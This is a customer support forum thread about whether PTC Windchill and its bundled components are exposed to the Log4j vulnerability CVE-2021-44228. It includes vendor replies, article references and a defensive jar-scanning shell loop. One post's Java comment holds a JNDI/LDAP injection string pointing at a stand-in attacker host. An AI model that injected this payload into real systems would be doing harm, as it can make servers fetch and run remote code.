Just opening this thread as I haven't seen it anywhere else. Have the been any talks about the log4j exploit and Windchill? We are on Windchill 11 so I would assume we are open to the vulnerability but haven't seen anything mentioning it anywhere on PTC's sites. Just looking to get ahead of this in any way possible.
Figured I would open this thread publicly instead of a support case as it is affecting everyone.
Solved! Go to Solution.
Hi @ErikZabokrtsky .
As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.
Please refer to this mini-site in order to get the latest updates on this investigation.
In case of any issue or doubt, please contact our Technical Support team.
Thank you.
--JC
good timing, i was just searching the ptc support site and could not find anything. we are on WC11.1 and the security team is looking for an immediate action. i am going to submit a high priority case to make sure ptc is aware of the issue.
PTC Technical Support Repose:
PTC R&D team and Security Team are actively working on priority for Log4j2 vulnerability CVE-2021-44228 reported.
The log4j version used by Windchill can detected by referring article. https://www.ptc.com/en/support/article/CS358667
PTC Security Experts will roll out an official communication soon about this CVE, its impact for customers & the next actions soon.
Scott
That article suggests that you look at this article: https://www.ptc.com/en/support/article/CS358789 which has some Immediate actions to take. It makes sense to do the Immediate actions .. immediately! Before thinking about how exactly the attacker will be exploiting Log4J.
Just my two cents. cheers -- Rick
Hi @ErikZabokrtsky .
As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.
Please refer to this mini-site in order to get the latest updates on this investigation.
In case of any issue or doubt, please contact our Technical Support team.
Thank you.
--JC
@Jean-Christophe wrote:
Hi @ErikZabokrtsky .
As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.
I hope they are also taking into account custom code like this:
WTPart part;
//part name = "${jndi:ldap://attacker.com/a}"
Logger log = LogR.getLogger(MyCustomClass.class.getName());
log.error("Is this an issue?? part name: " + part.getName());
Thank you for the suggestion, @RandyJones
Our security team has been extensively testing, but I will pass over your suggestion.
Hi @Jean-Christophe ,
Please could you pass on the question whether Office Workers are vulnerable, we found log4j-core-2.11.1.jar in Adobe Experience Manager (provided by PTC as part of Creo View Office Worker Adapters)
We can't find anything on regarding the workers the PTC support website.
Regards
Rob
Hi @rhart ,
Please be aware that we have created a minisite to act as a more comprehensive hub on this situation
I will pass over your question to the security team. In parallel, I encourage that you engage our support team for a closer assistance on your question
@Jean-Christophe wrote:
... In parallel, I encourage that you engage our support team for a closer assistance on your question
"Case Logger": https://www.ptc.com/en/support/case-logger
Thank for for raising this question to our support staff. We will publish the outcome of the investigation around Office Workers in the mini site once it is available.
Following is something one can use to find any jar file that contains the JndiLookup class or any class/path that contains the string JndiLookup. Because it is using "grep -i" this is a case insensitive search. This is what we used to find "affected" jar files in our Solr install This is sh or bash.
cd /opt/ptc/Windchill/Solr/SolrServer
for jar in `find . -name '*.jar' -print`
do
if [ "`jar tvf "$jar" | grep -i JndiLookup`" != "" ]; then
echo Issue in $jar
fi
done
Hello @HaithemBouajila
As stated in CS358789, Windchill 11.1 M020 and earlier(including 11.0 M030 and older versions) are using log4j 1.x, so it should be not vulnerable.
* PTC security teams is continuously monitors and analyzes supported Windchill releases for any reported critical or high CVE.
Please always check the latest CS358789 for updates.
3rd party bundled components may still be vulnerable, please:
Solr: Refer to CS359011, Solr of old Windchill releases (10.1, 10.2, 11.0) is not impacted by CVE-2021-44228.
Cognos: Refer to CS359007 and IBM update page An update on the Apache Log4j CVE-2021044228 vulnerability.
Tibco: Refer to CS359008 and TIBCO published article: TIBCO Log4j Vunerability Daily Update.
Thanks,
Susan